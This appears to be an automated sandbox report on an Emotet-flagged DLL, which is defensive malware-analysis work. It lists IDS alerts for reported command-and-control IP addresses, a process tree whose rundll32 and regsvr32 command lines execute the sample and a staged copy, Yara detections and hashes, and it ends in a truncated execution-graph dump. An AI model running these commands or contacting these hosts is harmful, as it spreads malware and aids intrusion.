                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                        01/14/22-19:33:26.871063 | TCP | 2404332 | ET CNC Feodo Tracker Reported CnC Server TCP group 17 | 49727 | 80 | 192.168.2.6 | 45.138.98.34
                        01/14/22-19:33:28.093726 | TCP | 2404338 | ET CNC Feodo Tracker Reported CnC Server TCP group 20 | 49728 | 8080 | 192.168.2.6 | 69.16.218.101

                        TCP Packets


                        System Behavior

                        General

                        Start time: 19:32:45
                        Start date: 14/01/2022
                        Path: C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit): true
                        Commandline: loaddll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll"
                        Imagebase: 0xb80000
                        File size: 116736 bytes
                        MD5 hash: 7DEB5DB86C0AC789123DEC286286B938
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.378920575.0000000000B50000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.380234706.0000000000B50000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.380280063.0000000000D31000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.403315549.0000000000B50000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.379032722.0000000000D31000.00000020.00000001.sdmp, Author: Joe Security
                        Reputation: moderate

                        General

                        Start time: 19:32:46
                        Start date: 14/01/2022
                        Path: C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit): true
                        Commandline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1
                        Imagebase: 0x2a0000
                        File size: 232960 bytes
                        MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: high

                        General

                        Start time: 19:32:46
                        Start date: 14/01/2022
                        Path: C:\Windows\System32\svchost.exe
                        Wow64 process (32bit): false
                        Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase: 0x7ff6b7590000
                        File size: 51288 bytes
                        MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: high

                        General

                        Start time: 19:32:46
                        Start date: 14/01/2022
                        Path: C:\Windows\SysWOW64\regsvr32.exe
                        Wow64 process (32bit): true
                        Commandline: regsvr32.exe /s C:\Users\user\Desktop\ALNgwfVtrB.dll
                        Imagebase: 0xf0000
                        File size: 20992 bytes
                        MD5 hash: 426E7499F6A7346F0410DEAD0805586B
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.421593787.0000000004051000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.421559907.0000000004020000.00000040.00000001.sdmp, Author: Joe Security
                        Reputation: high

                        General

                        Start time: 19:32:46
                        Start date: 14/01/2022
                        Path: C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit): true
                        Commandline: rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1
                        Imagebase: 0x8b0000
                        File size: 61952 bytes
                        MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.377076576.00000000046D1000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.376980438.00000000046A0000.00000040.00000001.sdmp, Author: Joe Security
                        Reputation: high

                        General

                        Start time: 19:32:46
                        Start date: 14/01/2022
                        Path: C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit): true
                        Commandline: rundll32.exe C:\Users\user\Desktop\ALNgwfVtrB.dll,DllRegisterServer
                        Imagebase: 0x8b0000
                        File size: 61952 bytes
                        MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425302680.00000000054F1000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.424744123.00000000033B0000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425412117.0000000005600000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425380885.00000000055D1000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425231298.00000000053C1000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425055302.0000000005200000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425273355.00000000054C0000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425444879.0000000005631000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425344500.00000000055A0000.00000040.00000001.sdmp, Author: Joe Security
                        Reputation: high

                        General

                        Start time: 19:32:48
                        Start date: 14/01/2022
                        Path: C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit): true
                        Commandline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",DllRegisterServer
                        Imagebase: 0x8b0000
                        File size: 61952 bytes
                        MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388319825.0000000005640000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388061342.00000000053B1000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388938400.0000000005A60000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388421865.00000000056A0000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388494502.00000000056D1000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388374896.0000000005671000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388137915.0000000005460000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388743358.0000000005900000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.387667842.0000000004E61000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.387995858.0000000005380000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.389038479.0000000005A91000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388835673.0000000005931000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.387132452.00000000033D0000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388209292.0000000005491000.00000020.00000001.sdmp, Author: Joe Security
                        Reputation: high

                        General

                        Start time: 19:32:52
                        Start date: 14/01/2022
                        Path: C:\Windows\System32\svchost.exe
                        Wow64 process (32bit): false
                        Commandline: C:\Windows\System32\svchost.exe -k WerSvcGroup
                        Imagebase: 0x7ff6b7590000
                        File size: 51288 bytes
                        MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Reputation: high

                        General

                        Start time: 19:32:52
                        Start date: 14/01/2022
                        Path: C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit): true
                        Commandline: C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6764 -ip 6764
                        Imagebase: 0x1150000
                        File size: 434592 bytes
                        MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language

                        General

                        Start time: 19:32:54
                        Start date: 14/01/2022
                        Path: C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit): true
                        Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 528
                        Imagebase: 0x1150000
                        File size: 434592 bytes
                        MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language

                        General

                        Start time: 19:32:55
                        Start date: 14/01/2022
                        Path: C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit): true
                        Commandline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mhgwckn\ikgetkts.aey",QTEnBIyMIuE
                        Imagebase: 0x8b0000
                        File size: 61952 bytes
                        MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.390300102.0000000004A11000.00000020.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.389941280.0000000003080000.00000040.00000001.sdmp, Author: Joe Security

                        General

                        Start time: 19:32:57
                        Start date: 14/01/2022
                        Path: C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit): true
                        Commandline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mhgwckn\ikgetkts.aey",DllRegisterServer
                        Imagebase: 0x8b0000
                        File size: 61952 bytes
                        MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language

                        General

                        Start time: 19:33:07
                        Start date: 14/01/2022
                        Path: C:\Windows\System32\svchost.exe
                        Wow64 process (32bit): false
                        Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase: 0x7ff6b7590000
                        File size: 51288 bytes
                        MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language

                        General

                        Start time: 19:33:12
                        Start date: 14/01/2022
                        Path: C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit): true
                        Commandline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",DllRegisterServer
                        Imagebase: 0x8b0000
                        File size: 61952 bytes
                        MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language

                        General

                        Start time: 19:33:29
                        Start date: 14/01/2022
                        Path: C:\Windows\System32\svchost.exe
                        Wow64 process (32bit): false
                        Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase: 0x7ff6b7590000
                        File size: 51288 bytes
                        MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language

                        General

                        Start time: 19:33:49
                        Start date: 14/01/2022
                        Path: C:\Windows\System32\svchost.exe
                        Wow64 process (32bit): false
                        Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase: 0x7ff6b7590000
                        File size: 51288 bytes
                        MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language

                        General

                        Start time: 19:33:57
                        Start date: 14/01/2022
                        Path: C:\Windows\System32\svchost.exe
                        Wow64 process (32bit): false
                        Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Imagebase: 0x7ff6b7590000
                        File size: 51288 bytes
                        MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language

                        Disassembly

                        Code Analysis

                          Execution Graph

                          Execution Coverage: 2.1%
                          Dynamic/Decrypted Code Coverage: 100%
                          Signature Coverage: 55.8%
                          Total number of Nodes: 1073
                          Total number of Limit Nodes: 5

                          Graph

4465->4464 4467->4469 4469->4448 4470->4464 4471->4464 4474->4464 4476 d54d85 4475->4476 4477 d3eb52 GetPEB 4476->4477 4478 d54e23 4477->4478 4478->4448 4480 d4cc0e 4479->4480 4481 d3eb52 GetPEB 4480->4481 4482 d4cc8d 4481->4482 4482->4464 4484 d322e8 4483->4484 4485 d3eb52 GetPEB 4484->4485 4486 d32377 4485->4486 4486->4464 4488 d31bfb 4487->4488 4489 d3eb52 GetPEB 4488->4489 4490 d31c85 4489->4490 4490->4464 4492 d3f2b2 4491->4492 4493 d3eb52 GetPEB 4492->4493 4494 d3f350 4493->4494 4494->4464 4496 d512da 4495->4496 4497 d3eb52 GetPEB 4496->4497 4498 d51380 4497->4498 4498->4464 4500 d3db84 4499->4500 4501 d3eb52 GetPEB 4500->4501 4502 d3dc0b 4501->4502 4502->4386 4504 d3503c 4503->4504 4505 d4c9b0 GetPEB 4504->4505 4506 d350e1 4505->4506 4506->4399 4511 d3e806 4507->4511 4508 d4cad5 GetPEB 4508->4511 4509 d3c5d8 GetPEB 4509->4511 4510 d3eb40 4510->4399 4511->4508 4511->4509 4511->4510 4513 d3fbad 4512->4513 4514 d3c5d8 GetPEB 4513->4514 4515 d40086 4513->4515 4516 d32194 GetPEB 4513->4516 4517 d40084 4513->4517 4514->4513 4518 d52b09 GetPEB 4515->4518 4516->4513 4517->4399 4518->4517 4520 d50a7e 4519->4520 4521 d3c5d8 GetPEB 4520->4521 4522 d4c4f8 GetPEB 4520->4522 4523 d50da7 4520->4523 4521->4520 4522->4520 4523->4404 4525 d4425e 4524->4525 4526 d3c5d8 GetPEB 4525->4526 4527 d4430e 4526->4527 4527->4423 4527->4527 4529 d3333e 4528->4529 4530 d531aa GetPEB 4529->4530 4531 d3335a 4530->4531 4531->4427 4533 d4e1ce 4532->4533 4534 d531aa GetPEB 4533->4534 4535 d4e1f0 4534->4535 4535->4424 4537 d3eda1 4536->4537 4538 d3eb52 GetPEB 4537->4538 4539 d3ee49 4538->4539 4539->4444 4541 d3ddcb 4540->4541 4542 d3eb52 GetPEB 4541->4542 4543 d3de63 4542->4543 4543->4444 4551 d34ec7 4544->4551 4546 d34fee 4547 d35009 4546->4547 4548 d52b09 GetPEB 4546->4548 4547->4444 4548->4547 4549 d3c5d8 GetPEB 4549->4551 4550 d4c9b0 GetPEB 4550->4551 4551->4546 4551->4549 4551->4550 4552 d52b09 GetPEB 4551->4552 4572 d49c65 4551->4572 4552->4551 4554 d51100 4553->4554 4555 d3eb52 GetPEB 
4554->4555 4556 d5119a 4555->4556 4556->4444 4576 d460b8 4557->4576 4561 d34abc 4560->4561 4562 d3eb52 GetPEB 4561->4562 4563 d34b44 4562->4563 4563->4444 4565 d4c8f4 4564->4565 4566 d3eb52 GetPEB 4565->4566 4567 d4c99d 4566->4567 4567->4444 4569 d4e36b 4568->4569 4570 d3eb52 GetPEB 4569->4570 4571 d4e3fa 4570->4571 4571->4435 4573 d49c85 4572->4573 4574 d3eb52 GetPEB 4573->4574 4575 d49d29 4574->4575 4575->4551 4577 d460de 4576->4577 4578 d3eb52 GetPEB 4577->4578 4579 d3efd1 4578->4579 4579->4444 4591 d31f38 4580->4591 4584 d40ade 4583->4584 4617 d4f790 4584->4617 4587 d40c1f 4587->4125 4590 d51538 GetPEB 4590->4587 4595 d31f57 4591->4595 4596 d320cc 4595->4596 4598 d320da 4595->4598 4600 d37603 4595->4600 4603 d506ec 4595->4603 4607 d3bd23 4595->4607 4611 d3e5c0 4595->4611 4599 d51538 GetPEB 4596->4599 4598->4125 4599->4598 4601 d3eb52 GetPEB 4600->4601 4602 d376d3 4601->4602 4602->4595 4604 d50702 4603->4604 4605 d3eb52 GetPEB 4604->4605 4606 d5079c 4605->4606 4606->4595 4608 d3bd40 4607->4608 4609 d3eb52 GetPEB 4608->4609 4610 d3bdeb 4609->4610 4610->4595 4614 d3556b 4611->4614 4615 d3eb52 GetPEB 4614->4615 4616 d355f6 4615->4616 4616->4595 4618 d3eb52 GetPEB 4617->4618 4619 d40bf0 4618->4619 4619->4587 4620 d3daaa 4619->4620 4621 d3dac8 4620->4621 4622 d3eb52 GetPEB 4621->4622 4623 d3db55 4622->4623 4623->4590 4625 d4e10e 4624->4625 4626 d3eb52 GetPEB 4625->4626 4627 d4e19c 4626->4627 4627->4132 4629 d48c96 4628->4629 4630 d3eb52 GetPEB 4629->4630 4631 d48d2f 4630->4631 4631->4132 4634 d4f859 4632->4634 4633 d4fb47 4633->4132 4634->4633 4635 d4a1c0 GetPEB 4634->4635 4636 d4fb19 4634->4636 4637 d3c5d8 GetPEB 4634->4637 4635->4634 4643 d4a1c0 4636->4643 4637->4634 4640 d354c9 4639->4640 4641 d3eb52 GetPEB 4640->4641 4642 d3555f 4641->4642 4642->4136 4644 d4a1f0 4643->4644 4645 d3eb52 GetPEB 4644->4645 4646 d4a28c 4645->4646 4646->4633 4648 d5451c 4647->4648 4649 d3eb52 GetPEB 4648->4649 4650 d545b7 4649->4650 4650->4149 4652 d3eb52 GetPEB 4651->4652 4653 d3dc97 
4652->4653 4653->4164 4655 d544d8 4654->4655 4656 d531aa GetPEB 4655->4656 4657 d544f7 4656->4657 4657->4164 4659 d46564 4658->4659 4660 d4fe2a GetPEB 4659->4660 4661 d46749 4660->4661 4662 d4fe2a GetPEB 4661->4662 4663 d46761 4662->4663 4664 d4fe2a GetPEB 4663->4664 4665 d46774 4664->4665 4672 d3e204 4665->4672 4668 d3e204 GetPEB 4669 d4679e 4668->4669 4676 d3e4f8 4669->4676 4673 d3e217 4672->4673 4674 d3eb52 GetPEB 4673->4674 4675 d3e2ae 4674->4675 4675->4668 4677 d3e511 4676->4677 4678 d3eb52 GetPEB 4677->4678 4679 d3e5b5 4678->4679 4679->4159 4681 d353e3 4680->4681 4682 d3eb52 GetPEB 4681->4682 4683 d3546b 4682->4683 4683->4057 4685 d400d8 4684->4685 4686 d3eb52 GetPEB 4685->4686 4687 d40170 4686->4687 4687->4173 4689 d42d03 4688->4689 4690 d3eb52 GetPEB 4689->4690 4691 d42d8e 4690->4691 4691->4173 4693 d32e23 4692->4693 4694 d3eb52 GetPEB 4693->4694 4695 d32ea5 4694->4695 4695->4173 4697 d3f997 4696->4697 4698 d531aa GetPEB 4697->4698 4699 d3f9b9 4698->4699 4699->4173 4701 d3305c 4700->4701 4702 d3eb52 GetPEB 4701->4702 4703 d330db 4702->4703 4703->4188 4715 d4b27f 4704->4715 4705 d4bb76 4707 d52b09 GetPEB 4705->4707 4706 d3c5d8 GetPEB 4706->4715 4710 d4bb89 4707->4710 4710->4188 4712 d52b09 GetPEB 4712->4715 4714 d3dc1b GetPEB 4714->4715 4715->4705 4715->4706 4715->4710 4715->4712 4715->4714 4716 d33046 GetPEB 4715->4716 4725 d3ee62 4715->4725 4729 d3fa95 4715->4729 4733 d4fd4e 4715->4733 4737 d3c3a7 4715->4737 4716->4715 4718 d47c9b 4717->4718 4719 d3eb52 GetPEB 4718->4719 4720 d47d35 4719->4720 4720->4188 4722 d4e8d0 4721->4722 4723 d3eb52 GetPEB 4722->4723 4724 d4e946 4723->4724 4724->4188 4726 d3ee81 4725->4726 4727 d3eb52 GetPEB 4726->4727 4728 d3eefb 4727->4728 4728->4715 4730 d3fad4 4729->4730 4731 d3eb52 GetPEB 4730->4731 4732 d3fb70 4731->4732 4732->4715 4734 d4fd79 4733->4734 4735 d3eb52 GetPEB 4734->4735 4736 d4fe12 4735->4736 4736->4715 4738 d3c3c9 4737->4738 4739 d3eb52 GetPEB 4738->4739 4740 d3c463 4739->4740 4740->4715 4743 d49e1d 4741->4743 
4742 d44244 GetPEB 4742->4743 4743->4742 4746 d4a1b5 4743->4746 4748 d4fecb GetPEB 4743->4748 4749 d496c2 4743->4749 4753 d45515 4743->4753 4758 d50a1a 4743->4758 4746->4199 4748->4743 4750 d496db 4749->4750 4751 d3eb52 GetPEB 4750->4751 4752 d49765 4751->4752 4752->4743 4762 d40de5 4753->4762 4755 d45670 4755->4743 4759 d50a3f 4758->4759 4760 d531aa GetPEB 4759->4760 4761 d50a5c 4760->4761 4761->4743 4763 d40dfe 4762->4763 4764 d3eb52 GetPEB 4763->4764 4765 d40eae 4764->4765 4765->4755 4766 d5138b 4765->4766 4767 d513b8 4766->4767 4768 d3eb52 GetPEB 4767->4768 4769 d51475 4768->4769 4769->4755 4776 d408fe 4770->4776 4771 d50db1 GetPEB 4771->4776 4772 d409b7 4773 d3e204 GetPEB 4772->4773 4775 d409b5 4773->4775 4774 d400c5 GetPEB 4774->4776 4775->4202 4776->4771 4776->4772 4776->4774 4776->4775 4778 d47a2c 4777->4778 4779 d4e1f8 GetPEB 4778->4779 4780 d47bfe 4779->4780 4781 d42c9c GetPEB 4780->4781 4782 d47c1b 4781->4782 4783 d4fecb GetPEB 4782->4783 4784 d47c2e 4783->4784 4787 d3d061 4784->4787 4788 d3d07a 4787->4788 4789 d3eb52 GetPEB 4788->4789 4790 d3d141 4789->4790 4790->4216 4792 d4b1af 4791->4792 4793 d3eb52 GetPEB 4792->4793 4794 d4b248 4793->4794 4794->4057 4812 d483d6 4795->4812 4796 d4851b 4797 d31a34 GetPEB 4796->4797 4800 d4854b 4797->4800 4798 d50db1 GetPEB 4798->4812 4799 d48516 4799->4233 4801 d4e1f8 GetPEB 4800->4801 4803 d48565 4801->4803 4802 d409dd GetPEB 4802->4812 4804 d52d0a GetPEB 4803->4804 4806 d485a6 4804->4806 4807 d4fecb GetPEB 4806->4807 4809 d485c6 4807->4809 4808 d4e1f8 GetPEB 4808->4812 4810 d485ff GetPEB 4809->4810 4810->4799 4811 d52d0a GetPEB 4811->4812 4812->4796 4812->4798 4812->4799 4812->4802 4812->4808 4812->4811 4813 d4fecb GetPEB 4812->4813 4912 d3baa9 4812->4912 4916 d3bfbe 4812->4916 4813->4812 4826 d504c6 4815->4826 4816 d505e9 4818 d485ff GetPEB 4816->4818 4817 d505e7 4817->4233 4818->4817 4819 d50db1 GetPEB 4819->4826 4820 d409dd GetPEB 4820->4826 4821 d3baa9 GetPEB 4821->4826 4822 d4e1f8 GetPEB 4822->4826 4823 d52d0a 
GetPEB 4823->4826 4824 d4fecb GetPEB 4824->4826 4825 d3bfbe GetPEB 4825->4826 4826->4816 4826->4817 4826->4819 4826->4820 4826->4821 4826->4822 4826->4823 4826->4824 4826->4825 4831 d3ba26 4827->4831 4828 d3ba9c 4828->4233 4829 d51028 GetPEB 4829->4831 4830 d52b09 GetPEB 4830->4831 4831->4828 4831->4829 4831->4830 4833 d51538 GetPEB 4831->4833 4927 d3f0e9 4831->4927 4833->4831 4935 d51f6d 4834->4935 4836 d50a64 GetPEB 4853 d3b3e7 4836->4853 4837 d4e1f8 GetPEB 4837->4853 4839 d485ff GetPEB 4839->4853 4840 d31a34 GetPEB 4840->4853 4841 d50db1 GetPEB 4841->4853 4842 d3b7fb 4842->4233 4843 d544ad GetPEB 4843->4853 4844 d3b7fd 4845 d51538 GetPEB 4844->4845 4845->4842 4846 d409dd GetPEB 4846->4853 4847 d400c5 GetPEB 4847->4853 4848 d4fecb GetPEB 4848->4853 4849 d52b09 GetPEB 4849->4853 4850 d3baa9 GetPEB 4850->4853 4852 d52d0a GetPEB 4852->4853 4853->4836 4853->4837 4853->4839 4853->4840 4853->4841 4853->4842 4853->4843 4853->4844 4853->4846 4853->4847 4853->4848 4853->4849 4853->4850 4853->4852 4854 d3bfbe GetPEB 4853->4854 4938 d3f726 4853->4938 4942 d4d8db 4853->4942 4854->4853 4861 d4cfe9 4855->4861 4857 d4d0f3 4859 d3f0e9 GetPEB 4857->4859 4858 d4d0f1 4858->4233 4859->4858 4861->4857 4861->4858 4952 d40ebc 4861->4952 4956 d53263 4861->4956 4964 d3e2bd 4861->4964 4875 d32ad8 4863->4875 4864 d32d78 4866 d485ff GetPEB 4864->4866 4865 d4c387 GetPEB 4865->4875 4868 d32da8 4866->4868 4867 d32d64 4872 d51538 GetPEB 4867->4872 4871 d32d62 4868->4871 4873 d51538 GetPEB 4868->4873 4871->4233 4872->4871 4873->4867 4874 d50db1 GetPEB 4874->4875 4875->4864 4875->4865 4875->4867 4875->4871 4875->4874 4876 d409dd GetPEB 4875->4876 4878 d51538 GetPEB 4875->4878 4879 d3baa9 GetPEB 4875->4879 4880 d4e1f8 GetPEB 4875->4880 4881 d52d0a GetPEB 4875->4881 4882 d4fecb GetPEB 4875->4882 4883 d3bfbe GetPEB 4875->4883 4977 d49774 4875->4977 4985 d4017b 4875->4985 4994 d4bc6b 4875->4994 4876->4875 4878->4875 4879->4875 4880->4875 4881->4875 4882->4875 4883->4875 4892 d4aadf 4884->4892 4885 
d4ac24 4886 d31a34 GetPEB 4885->4886 4888 d4ac51 4886->4888 4887 d50db1 GetPEB 4887->4892 4889 d4e1f8 GetPEB 4888->4889 4891 d4ac74 4889->4891 4890 d409dd GetPEB 4890->4892 4893 d52d0a GetPEB 4891->4893 4892->4885 4892->4887 4892->4890 4894 d3baa9 GetPEB 4892->4894 4897 d4e1f8 GetPEB 4892->4897 4900 d52d0a GetPEB 4892->4900 4901 d4ac1f 4892->4901 4902 d4fecb GetPEB 4892->4902 4903 d3bfbe GetPEB 4892->4903 4895 d4acaf 4893->4895 4894->4892 4896 d4fecb GetPEB 4895->4896 4898 d4accf 4896->4898 4897->4892 4899 d485ff GetPEB 4898->4899 4899->4901 4900->4892 4901->4233 4902->4892 4903->4892 4910 d5307f 4904->4910 4905 d5318a 4905->4233 4906 d53263 GetPEB 4906->4910 4907 d5318c 4908 d3f0e9 GetPEB 4907->4908 4908->4905 4909 d40ebc GetPEB 4909->4910 4910->4905 4910->4906 4910->4907 4910->4909 4911 d3e2bd GetPEB 4910->4911 4911->4910 4913 d3bac2 4912->4913 4914 d3dc1b GetPEB 4913->4914 4915 d3bb97 4914->4915 4915->4812 4917 d3bfd7 4916->4917 4918 d545ca GetPEB 4917->4918 4919 d3c273 4917->4919 4921 d3c271 4917->4921 4923 d4c41a 4917->4923 4918->4917 4920 d51538 GetPEB 4919->4920 4920->4921 4921->4812 4924 d4c440 4923->4924 4925 d3eb52 GetPEB 4924->4925 4926 d4c4e1 4925->4926 4926->4917 4928 d3f0ff 4927->4928 4931 d3f8a9 4928->4931 4932 d3f8c6 4931->4932 4933 d3eb52 GetPEB 4932->4933 4934 d3f1c3 4933->4934 4934->4831 4936 d3eb52 GetPEB 4935->4936 4937 d52000 4936->4937 4937->4853 4939 d3f758 4938->4939 4940 d3eb52 GetPEB 4939->4940 4941 d3f7dc 4940->4941 4941->4853 4943 d4d8fb 4942->4943 4944 d3c5d8 GetPEB 4943->4944 4945 d4db95 4943->4945 4946 d4db93 4943->4946 4944->4943 4948 d4cad5 4945->4948 4946->4853 4949 d4caef 4948->4949 4950 d4c9b0 GetPEB 4949->4950 4951 d4cbda 4950->4951 4951->4946 4953 d40ede 4952->4953 4954 d3eb52 GetPEB 4953->4954 4955 d40f72 4954->4955 4955->4861 4957 d5327e 4956->4957 4958 d53556 4957->4958 4969 d462c7 4957->4969 4958->4861 4961 d4c9b0 GetPEB 4962 d5350d 4961->4962 4962->4958 4963 d4c9b0 GetPEB 4962->4963 4963->4962 4967 d3e2d8 4964->4967 4965 
